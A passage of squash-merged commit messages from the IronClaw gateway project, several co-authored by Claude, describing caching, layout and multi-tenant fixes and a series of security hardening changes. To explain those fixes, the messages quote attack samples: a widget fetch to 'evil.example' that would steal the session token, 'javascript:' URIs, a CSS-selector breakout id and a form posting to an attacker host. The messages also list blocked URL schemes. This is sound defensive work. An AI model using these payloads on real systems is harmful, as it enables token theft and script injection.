`ETag` on the 200 response. The `Cache-Control: no-cache` stays so the browser always revalidates — together with the ETag this gives "fast 304" semantics rather than a stale `max-age` window where edits don't show up. Four new tests in `server.rs::tests`: - `test_css_etag_is_strong_validator_format` (no `W/`, quoted, ASCII) - `test_css_etag_changes_when_body_changes` (single-byte mutation invalidates) - `test_css_etag_stable_for_identical_body` (cache hit reproducible) - `test_css_handler_returns_etag_and_serves_304_on_match` (full handler round-trip via `tower::ServiceExt::oneshot`: 200 → ETag → 304 on match → 200 on stale validator) Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed (was 50; +2 for the new chat-config flag tests) - `cargo test --no-default-features --features libsql --lib channels::web` — 334 passed (includes the 4 new ETag tests, the existing widget loader tests, and the shared `read_layout_config` callers on both ends) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): land deferred items from PR #1725 paranoid-architect summary Both items the previous sweep (1c361d42) explicitly deferred. Closing the loop so they don't get lost as follow-up debt. 1. **`assemble_index` no longer silently drops layout serialization failures** (`crates/ironclaw_gateway/src/bundle.rs`). The `if let Ok(layout_json) = serde_json::to_string(&bundle.layout)` shortcut would discard the entire `window.__IRONCLAW_LAYOUT__` injection on error and the customized HTML would ship without any branding/tab/chat customizations applied — and the IIFE in `app.js` would no-op them all without leaving a trace. The branch is unreachable on well-typed input (`LayoutConfig` and every nested type derive `Serialize` cleanly), but a future field that adds a serialization-fallible type — `serde_json::Value`, a custom `Serialize` impl, an `i128` — would silently regress the entire customization path. Now the error branch logs `tracing::warn!` with the serde error so the failure is observable. Required pulling `tracing = "0.1"` into `crates/ironclaw_gateway/` (already in the workspace dep set; the gateway crate just hadn't needed it yet). 2. **`default_tab` is applied after the widget queue drains** (`crates/ironclaw_gateway/static/app.js`). The layout-config IIFE used to call `switchTab(layout.tabs.default_tab)` from inside the same block that handled branding/tabs/chat. That block runs *before* `_widgetInitQueue.drain` mounts widget panels, so any widget-provided tab id (e.g. `default_tab: "dashboard"` where `dashboard` comes from a registered widget) silently no-ops — `switchTab` looks up `#tab-dashboard`, finds nothing, and the user lands on the default built-in tab instead. The setting appeared broken to anyone who tried it. Fix: hoist the `default_tab` switch out of the layout IIFE and place it after the `_widgetInitQueue` drain. Hash navigation still wins (so `#chat` deep-links survive a customized `default_tab`), and the block only runs when a layout was actually injected. Left an inline `NOTE` at the original site so a future contributor doesn't "helpfully" move it back inside the IIFE. Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed (no count change; #1 is a logging path with no new test surface and #2 is JS-side) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * chore: update Cargo.lock for ironclaw_gateway tracing dep Forgotten in 8edca735, which added `tracing = "0.1"` to `crates/ironclaw_gateway/Cargo.toml` to support the new `tracing::warn!` on layout serialization failure in `assemble_index`. The `tracing` crate is already pulled in transitively elsewhere in the workspace, so this is purely a manifest-side dependency declaration. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): align layout selectors with real DOM (PR #1725 Copilot review) Two "low confidence" findings from the latest Copilot review pass that are both real bugs — the affected layout flags silently no-opped because the JS selectors didn't match the elements actually rendered by `static/index.html`. 1. **`tabs.hidden` only matched widget tabs, not built-ins.** `_addWidgetTab` creates buttons with `class="tab-btn"`, but the built-in tab `<button>`s in `index.html:157-162` are plain `<button data-tab="chat">` etc. with no class. The previous selector — `.tab-btn[data-tab="…"]` — therefore only matched widget-injected buttons, so a layout like `tabs.hidden: ["routines"]` (a built-in) silently did nothing. Switched to `.tab-bar button[data-tab="…"]`, which matches both variants while still scoping the lookup to the tab bar (so a stray `<button data-tab>` elsewhere on the page can't be hidden by accident). 2. **`chat.image_upload === false` targeted a non-existent element.** The handler tried to hide `#image-upload-btn`, but the actual composer in `index.html` uses `#attach-btn` (the visible paperclip) and `#image-file-input` (the hidden file input). The flag therefore never disabled image uploads. Now hides `#attach-btn` AND sets `#image-file-input.disabled = true`, so a programmatic `document.getElementById('image-file-input').click()` from a widget or extension can't bypass the operator's intent — the capability is actually gone, not just the chrome. Both bugs share the same root cause: the layout-config IIFE was written against a hypothetical DOM rather than the one `index.html` ships, and there's no e2e test that exercises a layout with `tabs.hidden` set to a built-in or `chat.image_upload: false`, so the regression slid through. (A follow-up Playwright scenario would catch the next instance of this — tracking separately rather than expanding the scope of this PR.) Quality gate: - `cargo fmt` clean - `cargo clippy -p ironclaw_gateway --tests` zero warnings - `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed (no count change; both fixes are JS-side) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * test(e2e): regression test for layout selector / DOM drift (PR #1725) The two `app.js` selector bugs Copilot caught in PR #1725 review pass 4072914579 (`tabs.hidden` only matched widget-injected `.tab-btn` buttons rather than built-in plain `<button data-tab>`s, and `chat.image_upload === false` targeted a non-existent `#image-upload-btn` instead of `#attach-btn` / `#image-file-input`) both slid through code review for the same root reason: there was no e2e test that loaded a customized layout and asked the browser whether the flags actually took effect. The unit tests on the Rust side verified `LayoutConfig` round-trips, and the existing widget-tab test exercised the *widget* path of the same selectors — neither would have caught a built-in-tab regression or a wrong DOM id. New scenario: `test_layout_hidden_built_in_tab_and_image_upload_disabled` * Writes a `.system/gateway/layout.json` with `tabs.hidden: ["routines"]` (a built-in, on purpose — the previous bug was that only widget tabs could be hidden, so the built-in is exactly what the selector regression broke) and `chat.image_upload: false`. * Drives the write directly via `/api/memory/write` rather than chat. The customization path is independent of the agent loop, and side-stepping the mock LLM keeps the test fast and decoupled from the canned-response set. * Reloads the gateway in a fresh browser context so `assemble_index` re-runs and `window.__IRONCLAW_LAYOUT__` carries the new flags. * Asserts via `getComputedStyle` (not the inline `style` attribute, so the assertion survives a future refactor that swaps `style.display = 'none'` for a class toggle): - The `routines` built-in tab has `display: none`. - `chat`, `memory`, and `settings` built-in tabs are still visible (catches accidental over-matching by a future selector change). - `#attach-btn` has `display: none`. - `#image-file-input.disabled === true`. Asserting BOTH the visible button hide AND the underlying input disable is the contract — a widget that calls `document.getElementById('image-file-input').click()` must NOT be able to bypass the operator's intent. * Each "tab disappeared from the DOM entirely" / "input doesn't exist" case has a distinct error message so a future `index.html` restructure produces an actionable failure rather than a confusing null-deref. Also added `.system/gateway/layout.json` to `_CUSTOM_PATHS` so `_wipe_customizations` clears it between tests in the shared session-scoped server fixture. Could not run the test locally — the e2e suite requires a libsql ironclaw binary build (~10 min) plus a Python venv with Playwright, neither of which is set up in this environment. Test is written against the same `_open_authed_page` / `_CUSTOM_PATHS` / `memory/write` patterns the rest of the file uses, and the DOM ids were grepped out of `crates/ironclaw_gateway/static/index.html` directly (`#attach-btn`, `#image-file-input`, `<button data-tab="routines">`). First real exercise will be in CI. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): refuse customized index in multi-tenant mode (PR #1725 blocker) Cross-tenant cache leak — `frontend_html_cache` is a single `Arc<RwLock<Option<FrontendHtmlCache>>>` per `GatewayState` with no user dimension, and `build_frontend_html` reads `state.workspace` directly. In multi-tenant deployments (`resolve_workspace(&state, &user)` driven by `workspace_pool`) this is unsafe in two compounding ways: 1. **Latent**: even without the cache, `build_frontend_html` reading `state.workspace` ignores the per-user pool entirely. If the single-user fallback workspace is also populated, every user sees that one global workspace's `layout.json` / widgets — one operator's branding, hidden tabs, and registered widgets leak to every other tenant on the same gateway. 2. **Cache pin**: even if (1) were fixed, the cache key is just `(.system/gateway/layout.json mtime, .system/gateway/widgets/ mtime)` against the global workspace — there is no `user_id` in the key. Once the slot is populated, every subsequent `GET /` hits the same HTML. Root cause: the customization assembly path is fundamentally single-tenant. `index_handler` (`GET /`) is the unauthenticated bootstrap route — no user identity is available at request time, so there is no way to resolve the *correct* per-user workspace inside `build_frontend_html`. The reviewer flagged this as a cache bug; it's actually an architectural mismatch that the cache makes visible. **Fix:** in multi-tenant mode (`workspace_pool` set), `build_frontend_html` short-circuits with `return None` BEFORE reading `state.workspace` and BEFORE the cache write at the bottom of the function. The embedded default `INDEX_HTML` is then served to every user, the static CSP layer applies unchanged (no inline scripts, no nonce needed), and the cache slot stays empty so it cannot pin any leaked HTML. This is the minimal fix that makes the gateway safe to ship in multi-tenant mode. Per-user customization in multi-tenant deployments will land in a follow-up PR via a JS-side `fetch('/api/frontend/layout')` after auth — that endpoint already exists and already routes through `resolve_workspace(&state, &user)`, so it returns the right workspace. The layout-config IIFE in `crates/ironclaw_gateway/static/app.js` already reads `window.__IRONCLAW_LAYOUT__`, which a future change can populate from that fetch instead of from server-side HTML injection. Documented the constraint in the doc comment on `build_frontend_html` so future contributors understand WHY the early return is there (hands-tied at the unauthenticated route, not laziness) and what the correct path forward looks like. Regression test: `test_build_frontend_html_returns_none_in_multi_tenant_mode` (gated on `feature = "libsql"` for the workspace backend). The test seeds a *global* workspace with a hostile-looking layout (`{"branding":{"title":"TENANT-LEAK-BAIT"}}`) AND a `WorkspacePool`, attaches both to the GatewayState via `Arc::get_mut`, and asserts: 1. `build_frontend_html` returns `None` — if it ever reads `state.workspace` again in multi-tenant mode, the bait title would land in the assembled HTML and this test would fail loudly with an actionable diagnostic. 2. `state.frontend_html_cache` slot is still `None` after the call — the early return must short-circuit BEFORE the cache write at the bottom of the function, otherwise a poisoned entry would serve the leaked HTML to subsequent requests even after the bug is fixed. Both contracts are independent — a future regression that breaks one without the other is still caught. Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test --no-default-features --features libsql --lib channels::web` — 335 passed (was 334; +1 for the new multi-tenant guard test) - `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): address PR #1725 Copilot review (6 findings) Six new inline findings from the latest Copilot review pass on PR #1725. All verified against the source — no false positives this round. Grouped by file: **1+2. Widget directory names not validated against `is_safe_segment`** (`src/channels/web/handlers/frontend.rs`). Both `load_widget_manifests` and `load_resolved_widgets` fed `entry.name()` straight into `read_widget_manifest`, which composed `{WIDGETS_DIR}{name}/manifest.json` and friends without checking the segment. Any filesystem-backed `Workspace` implementation that doesn't normalize `.`/`..`/backslash/NUL components would have allowed a widget directory called `..` (or with embedded separators) to escape the `.system/gateway/widgets/` subtree. The natural chokepoint is `read_widget_manifest` itself — both call sites already route through it for the `manifest.id == directory_name` check, so adding a single `is_safe_segment(directory_name)` guard at the top of that function fixes both call paths at once. Same validator the public `/api/frontend/widget/{id}/{*file}` endpoint already enforces, so widget *discovery* is now in line with widget *serving*. Regression test `skips_widget_with_unsafe_directory_name` covers `..`, `.`, embedded `/`, embedded `\`, and embedded NUL — five distinct rejection vectors. Probes `read_widget_manifest` directly so it covers both call sites with one tokio test. **3. `layout_has_customizations` over-triggers on empty branding colors** (`src/channels/web/server.rs`). Treating `branding.colors.is_some()` as a customization forced the per-response nonce CSP path even when both `primary` and `accent` were `None` or whitespace-only (which the `is_safe_css_color` validator strips at injection time). Replaced with a `has_branding_colors` check that requires at least one trimmed-non-empty color field, mirroring what `BrandingConfig::to_css_vars` actually emits. No security impact, just removes a pointless slow path that produced zero effective branding output. **4. FRONTEND.md "eval-equivalent constructs" claim was factually wrong** (`src/workspace/seeds/FRONTEND.md:71`). The Security model section told operators that widgets can use "`eval`-equivalent constructs that don't trip the CSP". The gateway CSP does NOT include `'unsafe-eval'`, so `eval()`, `new Function()`, and string-form `setTimeout` / `setInterval` are all blocked by the browser. Rewrote the sentence to describe what widgets *actually* have access to: `IronClaw.api.fetch` against same-origin endpoints, full DOM mutation, event listeners on the chat input, and dynamic `import()` from any origin allowed by the gateway's `script-src` (`'self'`, jsDelivr, cdnjs, esm.sh). The CSP narrows the *shape* of attacks a widget can mount, not the blast radius — the real trust boundary is still `memory_write` access to the workspace. **5. Bare-string `replace(NONCE_PLACEHOLDER, ...)` could mutate widget bodies** (`src/channels/web/server.rs`). `index_handler` previously did `html.replace(NONCE_PLACEHOLDER, &nonce)` to swap the per-response nonce into the assembled HTML. A widget author who wrote the literal string `__IRONCLAW_CSP_NONCE__` in their own JS — in a comment, log line, test fixture, or string constant — would have had their source silently mutated into a per-request nonce, breaking the widget in a way that's nearly impossible to debug. Extracted `stamp_nonce_into_html(html, nonce)` helper that targets the full attribute form `nonce="__IRONCLAW_CSP_NONCE__"` instead of the bare placeholder. The double-quoted sentinel is unambiguous in HTML context — it can never accidentally match free text in a JS module body, a comment, or a JSON payload. Two regression tests: - `test_stamp_nonce_into_html_replaces_attribute` — vanilla happy path, attribute on a `<script>` tag is rewritten. - `test_stamp_nonce_into_html_does_not_mutate_widget_body` — builds a fragment with TWO sentinels: one in the legitimate attribute (must be replaced) and one in the script body as a `const SENTINEL = "..."` constant (must NOT be replaced). Asserts the attribute was rewritten, the body sentinel survived intact, and exactly one occurrence of the placeholder remains in the result. A future regression to a bare-string replace would drop the body occurrence count to 0 and fail loudly with the diff. **6. `mock_llm._normalize_tool_calls` would crash on non-dict list elements** (`tests/e2e/mock_llm.py`). The function called `item.get(...)` on every list element with no shape check. A future `TOOL_CALL_PATTERNS` entry that accidentally returned a list of tuples / strings / `None` would crash mid-request with an opaque `AttributeError: 'tuple' object has no attribute 'get'` deep inside aiohttp's request handler, taking the whole mock server down for every test in the same `pytest` invocation. Added `isinstance` guards on both the list element AND its `arguments` field, plus a similar guard on the single-call branch. Each raises a clear `TypeError` naming the offending tool, the list index, and the unexpected type — so a malformed pattern fails at the exact line of the offense rather than as collateral damage three frames deep in aiohttp. Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test --no-default-features --features libsql --lib channels::web` — 338 passed (was 335; +3 for the new tests: `test_stamp_nonce_into_html_replaces_attribute`, `test_stamp_nonce_into_html_does_not_mutate_widget_body`, `skips_widget_with_unsafe_directory_name`) - `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed - `python3 -m py_compile tests/e2e/mock_llm.py` clean Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): address PR #1725 serrrfirat round 2 (multi-tenant CSS + URL validation) Two new findings from the latest serrrfirat review pass on PR #1725. A third finding (NONCE_PLACEHOLDER global replace mutating widget bodies) was already resolved in 56c43f56 — `stamp_nonce_into_html` is attribute-targeted with regression tests `test_stamp_nonce_into_html_ replaces_attribute` and `test_stamp_nonce_into_html_does_not_mutate_ widget_body` already locking the contract. **1. Medium — `css_handler` missing multi-tenant guard** (`src/channels/web/server.rs`). When I fixed `build_frontend_html` in b9da40e7 to refuse the customization assembly path under `workspace_pool.is_some()`, I missed the sibling `css_handler` — which still read `state.workspace` unconditionally to layer `.system/gateway/custom.css` onto `/style.css`. Same shape as the index leak: in multi-tenant mode the CSS handler would serve one operator's custom.css to every other tenant via the unauthenticated `/style.css` bootstrap route. Now mirrors the sibling guard: let css = if state.workspace_pool.is_some() { Cow::Borrowed(assets::STYLE_CSS) // refuse overlay path } else { // ... existing single-tenant overlay path }; The early return bypasses the workspace read entirely, so the hot path stays allocation-free (`Cow::Borrowed`). Per-user CSS overrides can ride a future authenticated `/api/frontend/custom-css` endpoint that routes through `resolve_workspace(&state, &user)`, mirroring the same follow-up plan for `/api/frontend/layout`. Regression test `test_css_handler_returns_base_in_multi_tenant_mode` (libsql-gated): seeds a global workspace with hostile-looking custom.css containing the literal string `TENANT-LEAK-BAIT`, attaches both the workspace AND a `WorkspacePool` to the GatewayState via `Arc::get_mut`, hits `/style.css` via `tower::ServiceExt::oneshot`, and asserts: 1. The bait marker is absent from the response body (catches a future regression that re-reads `state.workspace` in multi-tenant mode — the leaked content would land in the diagnostic). 2. The response body equals `assets::STYLE_CSS` byte-for-byte (catches a subtler regression where the leak content is dropped but the multi-tenant path still does the owned `format!`, breaking the borrowed hot-path optimization). Both contracts are independent — a future regression breaking either alone is still caught. **2. Medium — `logo_url` / `favicon_url` not validated** (`crates/ironclaw_gateway/src/layout.rs`). `BrandingConfig` had defense-in-depth for color values via `is_safe_css_color`, but URL fields accepted arbitrary strings. There's no current consumer in the `app.js` IIFE (the layout-config block doesn't read them yet), so no current vulnerability — but they're exposed via `GET /api/frontend/layout` and the `window.__IRONCLAW_LAYOUT__` JSON island, so the first consumer that renders them as `<img src="…">` or `<link rel="icon" href="…">` would inherit a latent footgun: `javascript:` URI XSS, `data:` URI payload stash, tracking-pixel exfiltration via attacker-controlled domains. Added `is_safe_url(value: &str) -> bool` validator (`pub(crate)`, mirroring `is_safe_css_color`) that accepts: - HTTPS / HTTP absolute URLs (HTTP allowed for intranet/dev usability — gateway enforces TLS at the network layer) - Site-relative paths (`/static/logo.png`) — must start with a single `/`, NOT `//` (protocol-relative URLs are scheme-flippable in the browser URL parser and historically a CSP-bypass source) And rejects: - `javascript:`, `data:`, `vbscript:`, `file:`, `blob:`, any other non-HTTP(S) scheme - HTML attribute breakout vectors (`<`, `>`, `"`, `'`, backtick, backslash) - Control chars (NUL, newline, CR, tab) for copy-paste smuggling defense - Empty / whitespace-only / > 2048 bytes (matches the de-facto Chrome / Apache URL length cap) Added `BrandingConfig::safe_logo_url(&self) -> Option<&str>` and `safe_favicon_url(&self) -> Option<&str>` getters that return `None` when the underlying field fails validation. This is the contract any future consumer must use — routing through the getter keeps validation at the type layer so a future caller can't accidentally bypass it by reading the raw `Option<String>` field. Updated `layout_has_customizations` in server.rs to call the new getters instead of `b.logo_url.is_some()` / `b.favicon_url.is_some()`, mirroring the precedent set for branding colors: a `layout.json` that only sets `logo_url: "javascript:alert(1)"` (and nothing else) no longer triggers the customized HTML path because the value gets dropped at the validator. Symmetric with how empty branding colors are gated. Tests in `layout::tests`: - `test_is_safe_url_accepts_common_forms` — HTTPS, HTTP, site-relative, leading/trailing whitespace - `test_is_safe_url_rejects_injection_vectors` — full classifier sweep: `javascript:` (case-insensitive), `data:`, `vbscript:`, `file:`, `blob:`, protocol-relative `//`, every HTML breakout char, every control char, empty, whitespace-only, length cap (asserts both the 2049-char rejection AND the 2048-char limit boundary), no-scheme bare hostname, single `/` root path - `test_branding_safe_logo_url_filters_invalid` — round-trip contract: safe values pass through, hostile values return None, absent values return None - `test_branding_safe_favicon_url_filters_invalid` — same contract for the parallel field so a future consumer can never accidentally route favicon through a bypass while logo is correctly validated Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test -p ironclaw_gateway` — 56 unit + 1 doctest passed (was 52; +4 for the URL validator tests) - `cargo test --no-default-features --features libsql --lib channels::web` — 339 passed (was 338; +1 for the css_handler multi-tenant guard test) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): address PR #1725 paranoid review round 3 (7 findings) Seven items from serrrfirat's third paranoid-architect pass on PR #1725. Two HIGH (token exfil + chat-renderer DOM bypass), three MEDIUM (widget id CSS injection + admin role on layout write + URL field visibility), one LOW (workspace path leak in 404), and one test coverage gap (CSP nonce e2e). Five "verified fixed" items from the audit need no code change — replied separately on the audit thread. **P-JS2 (HIGH) — IronClaw.api.fetch same-origin guard** (`crates/ironclaw_gateway/static/app.js`). The widget API's `fetch` method injected the session `Authorization: Bearer <token>` into *any* URL, including absolute cross-origin URLs. A widget calling `IronClaw.api.fetch('https://evil.example/steal')` would have exfiltrated the user's session token. Now resolves `path` against `window.location.origin` and rejects with a `TypeError` if the resulting origin differs from the gateway's. Same-origin and relative paths still work; site-relative `/api/foo`, `https://<this-host>/api/foo`, and other intra-origin shapes pass through unchanged. The error message names both the requested origin and the expected origin so the widget author sees the misuse at the offending call site. **P-JS1 (HIGH) — sanitize after registerChatRenderer callback** (`crates/ironclaw_gateway/static/app.js`). `renderMarkdown` runs `sanitizeRenderedHtml` (DOMPurify) on its output BEFORE `upgradeStructuredData` invokes registered chat renderers. A renderer's `render(contentEl, ...)` callback receives the live `.message-content` DOM element and can call `contentEl.innerHTML = '<form action="https://attacker">...'`, bypassing the sanitization step entirely. CSP blocks `<script>` execution either way, but form / iframe / object / clickjack-overlay injection still works. Now re-runs `sanitizeRenderedHtml` on `contentEl.innerHTML` after the renderer returns. DOMPurify is idempotent on already-safe HTML so the cost on the happy path is bounded by the sanitizer's walk of the post-renderer subtree. **P-W4 + P-H10 (MEDIUM) — widget id charset validation** (`crates/ironclaw_gateway/src/layout.rs`, `src/channels/web/handlers/frontend.rs`). `scope_css` raw-interpolates the widget id into `[data-widget="<id>"]` with no escape pass; a manifest id like `x"],.evil{color:red}[x` would close the attribute selector and inject arbitrary CSS rules. The HTML attribute side is already protected by `escape_html_attr`, but defense-in-depth at the type level closes both vectors and protects every future call site that interpolates the id without thinking about it. Added `is_safe_widget_id(s) -> bool` (`pub` in `layout.rs`, re-exported from `lib.rs`): `^[a-zA-Z0-9][a-zA-Z0-9._-]*$`, ≤64 chars. The first-char-must-be-alphanumeric rule means an id can't look like an option flag (`-foo`), a hidden file (`.foo`), or a separator fragment. Enforced at the chokepoint `read_widget_manifest` in `handlers/frontend.rs` alongside the existing `is_safe_segment(directory_name)` check, so a hostile manifest is rejected at load time before any rendering layer (CSS, HTML, path composition) sees the id. The reject-then-mismatch-check ordering matters: a hostile id is logged as "unsafe charset" rather than as a directory mismatch, which is the more useful diagnostic. Two new test layers: - `is_safe_widget_id_accepts_existing_fixtures` — every widget id used in test fixtures and FRONTEND.md examples must remain valid. Narrowing the regex after these have shipped would be a breaking change, so this test pins the contract. - `is_safe_widget_id_rejects_injection_payloads` — full sweep: serrrfirat's CSS-selector breakout payload, HTML attribute breakouts, path traversal vectors, whitespace, control chars, non-ASCII, leading non-alphanumeric, empty, and the 64-char boundary (64 passes, 65 fails). - `widget_loader::skips_widget_when_manifest_id_fails_charset_check` — end-to-end regression: write a manifest with the CSS-selector breakout id under a directory name that DOES pass `is_safe_segment`, and verify both `read_widget_manifest` and `load_resolved_widgets` reject it. Catches a future regression that moves the check away from the chokepoint. **P-H9 (MEDIUM) — AdminUser on layout write endpoint** (`src/channels/web/handlers/frontend.rs`). `frontend_layout_update_handler` used `AuthenticatedUser` (any role), so a `member`-role token holder could rewrite the global layout in single-tenant mode — changing branding, hiding tabs, disabling widgets for every user of the gateway. Switched to `AdminUser`. In multi-tenant mode this still scopes per-user via `resolve_workspace`, so admins configuring their own tenant get the expected behavior; member tokens are now denied at the role gate the same way they're denied for user management and secrets management. `AdminUser` is a `pub struct AdminUser(pub UserIdentity)` so the existing `&user` argument to `resolve_workspace` works without changes — added it to the existing `use ...auth::{...}` import alongside `AuthenticatedUser`. **P-L3 (MEDIUM) — sanitize URL fields on serialize + downgrade visibility** (`crates/ironclaw_gateway/src/layout.rs`). `safe_logo_url` / `safe_favicon_url` getters existed with proper `is_safe_url` validation, but the underlying `pub Option<String>` fields were directly accessible — both for Rust callers (who could read them by name without going through the validator) and for the JS side via the `window.__IRONCLAW_LAYOUT__` JSON island, which serializes the raw struct. A future consumer rendering `<a href="${layout.branding.logo_url}">` would inherit the `javascript:` URI XSS that the safe getter is supposed to prevent. Two-part fix: 1. Downgraded `logo_url` and `favicon_url` to `pub(crate)`. All existing constructors are intra-crate (verified by grep), so no public API breakage. External Rust callers must now route through the safe getters by construction. 2. Added `skip_unsafe_url` serde predicate (`#[serde(skip_serializing_if = "skip_unsafe_url")]`) that drops the field from JSON output when the value is missing, empty, or fails `is_safe_url`. Closes the wire-format leg: even if a future intra-crate caller bypasses the getters and writes a hostile value into the field directly, the JSON shipped to the JS side and to `GET /api/frontend/layout` simply omits the field entirely. No `null`, no `javascript:` payload, nothing for a future consumer to inadvertently render. The first iteration tried `serialize_with` for the same job, but that runs *after* `skip_serializing_if` so a hostile value serialized as `null` instead of being skipped. Predicate-side filtering is the correct shape — `skip_unsafe_url` returns `true` on every "drop the field" branch and `false` only when the value is present-and-safe. Two new tests pin both the wire format and the happy path: - `branding_serialize_drops_hostile_urls` — serializes a config with `javascript:` and `data:` URIs and asserts the resulting JSON contains neither `logo_url` nor `favicon_url` keys, AND that the hostile payload strings don't appear anywhere in the output. - `branding_serialize_preserves_safe_urls` — round-trip check: `https://example.com/logo.png` and `/favicon.ico` survive serialization unchanged so legitimate operator branding still reaches the JS side. **P-H1 (LOW) — strip workspace path from widget 404 error** (`src/channels/web/handlers/frontend.rs`). The handler returned `format!("Widget file not found: {path}")`, leaking the resolved `.system/gateway/widgets/{id}/{file}` path back to the caller. That gives an attacker a free oracle for "what directories exist" inside the workspace. Now returns the generic message `"Widget file not found"` and logs the full path internally via `tracing::warn!` so debugging a 404 still works. …
…steps for skills (#2216) * fix: explain in more details`activation` block & installation steps for skills * chore: apply review from gemini --------- Co-authored-by: Guille <gagdiez.c@gmail.com>
* fix(bridge): sanitize auth_url on engine v2 path (#2206) The engine-v2 effect adapter forwarded `auth_url` from `tool_activate`/`tool_auth` output (and from the v2 pre-flight auth gates) directly into `ResumeKind::Authentication` without scheme validation, leaving the v2 path open to `javascript:`, `file://`, `http://`, and `data:` URLs from a buggy or compromised local extension. The v1 dispatcher path already had a private `sanitize_auth_url` helper from #2038; v2 was the asymmetry. Promote `sanitize_auth_url` to `crate::auth::oauth` (its natural home next to the rest of the shared OAuth runtime) as `pub(crate)`, drop the private copy in `agent::dispatcher`, and apply it at every v2 site that builds an `auth_url` from runtime data: - `effect_adapter::auth_gate_from_extension_result` (post-exec) - `effect_adapter` `tool_install` post-readiness branch - `effect_adapter` `check_action_auth` pre-flight gate - `effect_adapter` `check_tool_readiness` pre-flight gate - `auth_manager::check_tool_readiness` (extension `auth.auth_url()`) - `auth_manager::execute_latent_extension_action` Regression test drives `EffectBridgeAdapter::execute_action` with a stub `OAuthPromptTool` returning `auth_url: "javascript:alert(1)"` and asserts the resulting `ResumeKind::Authentication.auth_url` is `None` — per the "Test Through the Caller, Not Just the Helper" rule, since the helper-level test alone would not have caught the v2 gap. A sibling test asserts that a well-formed `https://` URL still flows through unchanged. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(bridge): close remaining auth_url sanitization gaps (#2206) Address two review comments on #2215: - Copilot (auth_manager.rs:299): the fallback `described.auth_url` in `check_tool_readiness` ultimately flows from a skill manifest's `oauth.authorization_url` via `start_skill_oauth_if_supported` and was not sanitized. The issue scoped config-derived URLs as out of scope, but applying the sanitizer here is a one-line, zero-risk change that prevents the next refactor from quietly reintroducing the gap. Sanitize both branches before `.or_else()`. - serrrfirat (effect_adapter.rs:598): the `LatentActionExecution::NeedsAuth` consumer in `execute_action` was the only one of the five `ResumeKind::Authentication` construction sites in this file that did not call `sanitize_auth_url`. The source (`auth_manager::execute_latent_extension_action`) already sanitizes, but the asymmetry made the consumer fragile to upstream changes. Apply the helper here too so all five sites share the same belt-and-suspenders pattern. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* feat: add amazon tutorial * chore: apply suggestions from code review Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com> Co-authored-by: Guille <gagdiez.c@gmail.com> * chore: apply suggestions from code review Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com> Co-authored-by: Guille <gagdiez.c@gmail.com> --------- Co-authored-by: Guille <gagdiez.c@gmail.com> Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
* fix(oauth): use localhost for redirect URI when bound to 0.0.0.0 Google rejects redirect_uri=http://0.0.0.0:<port>/oauth/callback as invalid. When no tunnel public_url is configured, the gateway base URL was built directly from GATEWAY_HOST, which is a bind address — not a routable hostname. Map unspecified addresses (0.0.0.0, ::, [::]) to localhost, matching the social-login flow's existing fallback. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(oauth): use IpAddr::is_unspecified for robust wildcard detection Address PR feedback: replace string matching with std::net::IpAddr parsing so all representations of unspecified addresses (including 0:0:0:0:0:0:0:0) are caught. Add regression tests. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: use is_ok_and instead of map_or(false, ..) to satisfy clippy Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* feat: add Composio WASM tool for third-party app integrations
Add Composio integration as a WASM tool (tools-src/composio/), providing
a single multiplexed tool with 4 actions: list, execute, connect, and
connected_accounts. Supports 250+ third-party apps via Composio's REST
API with WASM sandbox security (fuel metering, memory limits, network
allowlisting, host-injected credentials).
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix: address review — retry safety, dead code, registry manifest
Code fixes (tools-src/composio/src/lib.rs):
- Only retry GET requests (idempotent); POST executes once to prevent
duplicate side effects on execute/connect actions
- Remove dead parse_json_response status check (already handled by
caller); use serde_json::from_slice to avoid extra allocation
- Remove misleading secret_exists pre-flight (only checks capability
allowlist, not actual presence); instead surface helpful error on
401/403 from the API
- Extract entity_id logic into extract_entity_id() helper with 6 unit
tests covering precedence chain and edge cases
Registry:
- Add registry/tools/composio.json manifest (matches format of other
tools like web-search, github, gmail)
- Add composio to the default bundle in _bundles.json
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix: restore secret pre-flight, enforce schema, remove default tag
- Restore secret_exists pre-flight as best-effort check (avoids wasting
rate-limited API calls when clearly misconfigured)
- Add #[serde(deny_unknown_fields)] to Params to match the schema's
additionalProperties: false contract
- Remove "default" tag from registry manifest and remove from default
bundle until WASM artifacts are published
